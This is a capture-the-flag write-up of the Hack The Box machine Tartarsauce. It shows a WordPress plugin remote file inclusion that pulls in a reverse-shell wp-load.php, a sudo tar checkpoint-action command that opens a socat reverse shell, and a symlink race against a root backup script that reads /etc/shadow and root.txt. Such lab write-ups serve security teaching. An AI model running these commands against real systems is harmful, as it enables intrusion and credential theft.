HTB{ Tartarsauce }

Oct 20, 2018 | 12 minutes read

Tags: hack the box, inotify, tar, python

This was a challenging box. It had a lot of places to get lost in the sauce (ba-dum tssss). I found myself crawling back out of rabbit holes more than once while working on Tartarsauce. The two authors, 3mrgnc3 & ihack4falafel, did an excellent job of putting together a box that felt like it was straight out of OSCP. Enumeration and avoiding time-sinks were the keys to success here.




As usual, we start off with a masscan followed by a targeted nmap.

masscan -e tun0 --ports U:0-65535,0-65535 --rate 700 -oL scan.
open tcp 80 1538755374
# end

nmap - tcp

nmap -sC -sV -oN nmap.scan -p 80
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

nmap returns a ton of juicy-looking URLs from robots.txt. Unfortunately, they were all rabbit holes.


The real entry point was easy to miss unless you’re used to iteratively running gobuster against each newly discovered directory, or you use a recursive directory enumeration tool.

The first gobuster scan shows /webservices (which we also saw in the nmap scan).

gobuster -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -t 20 -o "gobuster."
http:// (Status: 403)
http:// (Status: 403)
http:// (Status: 403)
http:// (Status: 200)
http:// (Status: 200)
http:// (Status: 403)
http:// (Status: 301)

The second gobuster on the /webservices directory.

http:// (Status: 403)
http:// (Status: 403)
http:// (Status: 403)
http:// (Status: 301)

The final gobuster on the /webservices/wp directory. This is the one where we know we’re dealing with a WordPress install, due to the directory structure (wp-content, wp-admin, etc.).

(Status: 403)
(Status: 403)
(Status: 403)
(Status: 301)
(Status: 301)
(Status: 301)
(Status: 301)

Initial Access


Knowing we’re dealing with a WordPress install, wpscan immediately jumps to mind, as it’s the standard WordPress scanning tool.

wpscan -ep --url
wpscan options used:

    --enumerate | -e [option(s)]
      option :
        p        plugins

[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)


If you dig a bit into this plugin, the specific XSS vulnerability referenced isn’t what’s interesting. The interesting piece is outlined in the readme.txt included with the plugin, specifically, the changelog.

== Changelog ==

= 2.3.10 =
* 2018-2-12
* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D

= 1.5.3 =
* 2015-10-01
* When email is disabled, save it anyway when user is logged in.
* Add nb_NO (thanks Bjørn Inge Vårvik).
* Update ru_RU.

Now that we know the real version is 1.5.3, the way forward becomes clear: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion. According to the Exploit-DB entry, the abspath parameter is passed into a PHP require() call that tries to include a remote file named wp-load.php. We can serve up our own version of that file for RCE.


We can use the php reverse shell hosted on pentestmonkey as our wp-load.php. We just need to modify two lines within the file to reflect our IP address and port, then rename the file to wp-load.php.

# Malicious wp-load.php

$ip = '';  // CHANGE THIS
$port = 12344;       // CHANGE THIS


Spin up a local web server on kali for the target to reach out to when searching for its wp-load.php. Also on kali, fire up a listener to catch the callback.

python3 -m http.server 80 


nc -nlvp 12344 

The final step is to make the request using the vulnerable parameter.
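The exact URL is an assumption pieced together from the Exploit-DB entry (the abspath parameter on the plugin's ajaxresponse.php); a quick sketch of building it, with placeholder hostnames:

```python
# Sketch of the RFI request, based on the Exploit-DB entry for Gwolle
# Guestbook 1.5.3. TARGET/ATTACKER are placeholders, not real hosts.
from urllib.parse import urlencode

target = "http://TARGET"       # the box
attacker = "http://ATTACKER/"  # our python3 http.server hosting wp-load.php

# Vulnerable script inside the plugin (path per the Exploit-DB write-up).
vuln_path = ("/webservices/wp/wp-content/plugins/gwolle-gb"
             "/frontend/captcha/ajaxresponse.php")

# The plugin appends 'wp-load.php' to abspath before require()-ing it,
# so pointing abspath at our web server makes the target fetch our shell.
url = target + vuln_path + "?" + urlencode({"abspath": attacker})
print(url)
```

Requesting that URL with curl or a browser triggers the include and pops the listener.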


We serve up the php via python and receive our callback.

Serving HTTP on port 80 ( ... - - [05/Oct/2018 12:23:09] "GET /wp-load.php HTTP/1.0" 200 -
Ncat: Connection from

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

\o/ - access level: www-data

www-data to onuma

tar as a Callback

Basic enumeration steps showed that we are able to run the /bin/tar command as the user onuma without a password via sudo.

Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

We can elevate privileges with the tar command below and grab a full tty shell while we’re at it by using a socat callback as the argument to checkpoint-action.

Local on kali.

socat file:`tty`,echo=0,raw tcp4-listen:12323

On target.

sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='/tmp/socat_x86 tcp-connect: exec:"bash -li",pty,stderr,setsid,sigint,sane'

tar options used:

    --checkpoint[=NUMBER]
        display progress messages every NUMBERth record (default 10)

    --checkpoint-action=ACTION
        execute ACTION on each checkpoint;
        the exec action executes a given external command
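To see why this is dangerous without involving socat, the harmless demo below (assuming GNU tar is available, as it is on the target) reuses the same flags and has tar run a simple touch in place of a shell:

```python
# Demo of --checkpoint-action=exec: tar itself runs the named command.
# Launched through sudo, that command would run as the sudo target user.
import os, subprocess, tempfile

marker = os.path.join(tempfile.mkdtemp(), "pwned")

subprocess.run(
    ["tar", "-cf", os.devnull, "/dev/null",
     "--checkpoint=1",                             # checkpoint every record
     f"--checkpoint-action=exec=touch {marker}"],  # command tar executes
    check=True, capture_output=True)

print(os.path.exists(marker))  # True if tar executed our command
```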

onuma to root.txt

The backuperer Service

During re-enumeration as onuma, we notice that there is an interesting systemd service running.




There is also an associated timer.

Description=Runs backuperer every 5 mins

# Time to wait after booting before we run first time
# Time between running each consecutive time

These two items together run the script below every 5 minutes as the root user.

The key take-aways from the script are highlighted. Essentially, there is a 30-second window between backing up /var/www/html and performing the integrity check with diff. We’ll use that window of time to get root level read access to the filesystem.

 4  # backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
 5  # ONUMA Dev auto backup program
 6  # This tool will keep our webapp backed up incase another skiddie defaces us again.
 7  # We will be able to quickly restore from a backup in seconds ;P
10  # Set Vars Here
16  tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
19  # formatting
22      for n in $(seq 72);
23      do /usr/bin/printf $"-";
24      done
28  # Added a test file to let us see when the last backup was run
29  /usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
31  # Cleanup from last time.
32  /bin/rm -rf $tmpdir/.* $check
34  # Backup onuma website dev files.
35  /usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
37  # Added delay to wait for backup to complete if large files get added.
38  /bin/sleep 30
40  # Test the backup integrity
43      /usr/bin/diff -r $basedir $check$basedir
46  /bin/mkdir $check
47  /bin/tar -zxvf $tmpfile -C $check
48  if [[ $(integrity_chk) ]]
50      # Report errors so the dev can investigate the issue.
51      /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
52      integrity_chk >> $errormsg
53      exit 2
55      # Clean up and save archive to the bkpdir.
56      /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
57      /bin/rm -rf $check .*
58      exit 0

Quick analysis of the code:

  • Line 35: As onuma, create a gzipped tarfile named something like /var/tmp/.e67b1d9… with the contents of /var/www/html/
  • Line 38: Sleep 30 seconds
  • Line 47: Extract /var/tmp/.e67b1d9… into /var/tmp/check
  • Line 52: Append results of running Line 43 into /var/backups/onuma_backup_error.txt
  • Line 43: Recursively diff /var/www/html and /var/tmp/check/var/www/html

Because we are onuma, we can alter the tarball created by the script. The contents of /var/www/html never change, but we can change the contents of the tarball. If any files are different between the two folders, the differences will be captured in the error log.

Steps to exploit the race condition introduced in the code above:

  • Untar the newly created tarball from /var/tmp to modify
  • Symlink a file we want to read to a file within our local version
  • Retar the tarball in its original location
  • Allow the backuperer to diff what the file should be with what our link points to
  • Read results from /var/backups/onuma_backup_error.txt
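The steps above can be sketched as a pair of helper functions (a rough sketch: the victim file choice is arbitrary, and on the box this would run as onuma against /var/tmp and finish inside the 30-second sleep window):

```python
# Rough sketch of the manual race exploit; the paths mirror the backuperer
# script analyzed above, and the victim file is an arbitrary choice.
import glob, os, subprocess

def find_hidden_tarball(tmpdir):
    """Return backuperer's hidden tarball inside tmpdir, or None if absent."""
    hidden = [p for p in glob.glob(os.path.join(tmpdir, ".*"))
              if os.path.isfile(p)]
    return hidden[0] if hidden else None

def swap_in_symlink(tarball, workdir, victim_rel, target_file):
    """Unpack the tarball, replace victim_rel with a symlink to target_file,
    and re-tar it in place -- all before the sleep window closes."""
    os.makedirs(workdir, exist_ok=True)
    subprocess.run(["tar", "-zxf", tarball, "-C", workdir], check=True)
    victim = os.path.join(workdir, victim_rel)
    os.remove(victim)
    os.symlink(target_file, victim)   # root's diff will read through this
    subprocess.run(["tar", "-zcf", tarball, "-C", workdir]
                   + os.listdir(workdir), check=True)

# On target (as onuma), something like:
#   tarball = find_hidden_tarball("/var/tmp")
#   swap_in_symlink(tarball, "/tmp/work",
#                   "var/www/html/robots.txt", "/root/root.txt")
```

When the service extracts the doctored tarball as root and diffs it against the real webroot, the contents of the linked file land in /var/backups/onuma_backup_error.txt.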

Now that we have a way ahead, let’s put our analysis into action.

Over-engineering at its Finest

There are a lot of ways to determine when the tarball is alive and available for manipulation. pspy and a simple process-watcher script come to mind, and both are much simpler solutions than what I outline below. I’ve been waiting for an excuse to play with inotify and this was a perfect opportunity.

I wanted to write a program that used inotify to trigger reactions when backuperer ran. pspy uses inotify under the hood as well, which is really what got me interested in playing with inotify in the first place. I chose to use python and pyinotify instead of C.

The general steps to the script are what is laid out above. Additionally, I wanted to implement a few nice-to-haves as well.

  • Works without interaction by watching for events (inotify)
  • Ability to read arbitrary number of files (assuming enough real files to link against)
  • Ability to run on target without installing dependencies (zipapp)
  • Only shows me relevant information from /var/backups/onuma_backup_error.txt

Watch for Events (inotify)

As I previously mentioned, the key feature that I wanted to play with while writing this script was inotify. The pyinotify module makes handling events really simple.

The basic premise is that you create watches and add them to a watch list. Each item (“watch”) in the watch list specifies the pathname of a file or directory, along with some set of events that the kernel should monitor for the file referred to by that pathname.

When events occur for monitored files and directories, those events are made available to the application as structured data.

For my script, I set two watches detailed below.


The first watch used IN_CLOSE_WRITE on /var/tmp. The IN_CLOSE_WRITE event is triggered when a file that was opened for writing is closed.

The code below creates the WatchManager and adds a watch that handles events produced when a file within /var/tmp that was opened for writing is closed.

wm = pyinotify.WatchManager()
wm.add_watch('/var/tmp', pyinotify.IN_CLOSE_WRITE)  

That done, we define an event handler and register a callback that will execute each time a file that was opened for writing is closed within /var/tmp. We use IN_CLOSE_WRITE because we want the entire tarball to be complete before we do anything with it. pyinotify uses the naming convention process_EVENT_NAME within ProcessEvent subclasses to know which callback function to call when an event occurs.

class EventHandler(pyinotify.ProcessEvent):
    def __init__(self, *args, **kwargs):
        # -------------8<-------------
    def process_IN_CLOSE_WRITE(self, event: pyinotify.Event) -> None:
        # This function is designed to trigger on the creation of the tarball generated by /usr/sbin/backuperer
        # -------------8<-------------
    def process_IN_MODIFY(self, event: pyinotify.Event) -> None:
        # This function is designed to trigger when /var/backups/onuma_backup_error.txt is appended to
        # -------------8<-------------

handler = EventHandler(...)
notifier = pyinotify.Notifier(wm, handler)


The second watch used IN_MODIFY on /var/backups/onuma_backup_error.txt. The IN_MODIFY event is triggered when a file is modified.

The code below adds another watch to the WatchManager that handles events produced when the error log is modified, i.e. after the diff happens and its output is appended to the error log.

wm.add_watch('/var/backups/onuma_backup_error.txt', pyinotify.IN_MODIFY)  # for reading error_log

The additional watch works in concert with the EventHandler class above. With callbacks registered to watch for events triggered by the backuperer service, the next step is to package everything up and get it to target.

Packaged Dependencies (zipapp)

To deploy the script with its dependencies, I chose to use the zipapp module. This module provides tools to manage the creation of zip files containing Python code, which can be executed directly by the Python interpreter.

If you’ve never heard of or played with this module, it’s pretty baller. It isn’t a solution for all dependency problems, but for simple cases, it can be incredibly useful. To magic the script and pyinotify into a single executable zip, all that’s needed is the following:

  • Create a directory
  • Within that directory, create your script and name it __main__.py
  • Install dependencies into the new directory via pip install PACKAGE --target DIR
  • Create the final zip file using the zipapp module.

You can try it out for yourself by using the commands below.

git clone
cd htb-scripts-for-retired-boxes/tartarsauce
python3 -m pip install pyinotify --target triggered
python3 -m zipapp -p "/usr/bin/env python3" triggered

After running the commands above, you should have a triggered.pyz file sitting in your current working directory. If you run file on it, you can see it’s labeled as a zip archive.

NOTE: I had to do the following on my kali box to get pip3 installed, YMMV
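The same packaging can also be done from Python itself via the stdlib zipapp API. A minimal sketch with a throwaway hello app (hypothetical demo, not the actual triggered script):

```python
# Build and run a tiny zipapp entirely from Python (hypothetical demo app).
import os, subprocess, sys, tempfile, zipapp

appdir = tempfile.mkdtemp()
with open(os.path.join(appdir, "__main__.py"), "w") as f:
    f.write('print("hello from a zipapp")\n')

pyz = os.path.join(tempfile.mkdtemp(), "hello.pyz")
# interpreter= writes the shebang that makes the archive directly executable
zipapp.create_archive(appdir, pyz, interpreter="/usr/bin/env python3")

# The interpreter imports __main__ straight out of the zip.
result = subprocess.run([sys.executable, pyz], capture_output=True, text=True)
print(result.stdout.strip())  # -> hello from a zipapp
```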


Test Run

For the sake of brevity, I didn’t include the entire script here. You can find it here. I commented it well enough that it’s hopefully easy to follow. I plan to start including non-trivial HTB solution-related scripts in that repo (smasher comes to mind).

Here is a sample run of the script against a few files.

./triggered.pyz /var/tmp --to_read /root/root.txt /var/backups/gshadow.bak /var/backups/shadow.bak /var/backups/passwd.bak /var/backups/group.bak /etc/shadow /etc/gshadow
[+] Files to read:
[-] /root/root.txt
[-] /var/backups/gshadow.bak
[-] /var/backups/shadow.bak
[-] /var/backups/passwd.bak
[-] /var/backups/group.bak
[-] /etc/shadow
[-] /etc/gshadow

[+] Tarball created by /usr/sbin/backuperer
[-] /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8

[+] Files from /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 extracted

[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-mail.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-mail.php to /root/root.txt
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-links-opml.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-links-opml.php to /var/backups/gshadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-comments-post.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-comments-post.php to /var/backups/shadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/.htaccess
[-] Linking /tmp/var/www/html/webservices/wp/.htaccess to /var/backups/passwd.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-trackback.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-trackback.php to /var/backups/group.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/xmlrpc.php
[-] Linking /tmp/var/www/html/webservices/wp/xmlrpc.php to /etc/shadow
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-cron.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-cron.php to /etc/gshadow
[-] All files to be read are linked.

[+] Tarring up the altered backup.
[-] Tarball /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 created.

[+] Error log modified, checking results.

[+] /var/backups/passwd.bak

[+] /var/backups/shadow.bak

[+] /etc/gshadow

[+] /var/backups/gshadow.bak

[+] /root/root.txt

[+] /var/backups/group.bak

[+] /etc/shadow

As you can see, it can grab any root owned file, including root.txt. I had a lot of fun working on the box and finally squirreling out and writing the script to automate the root read access.

\o/ - root read access

I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.


Additional Reading
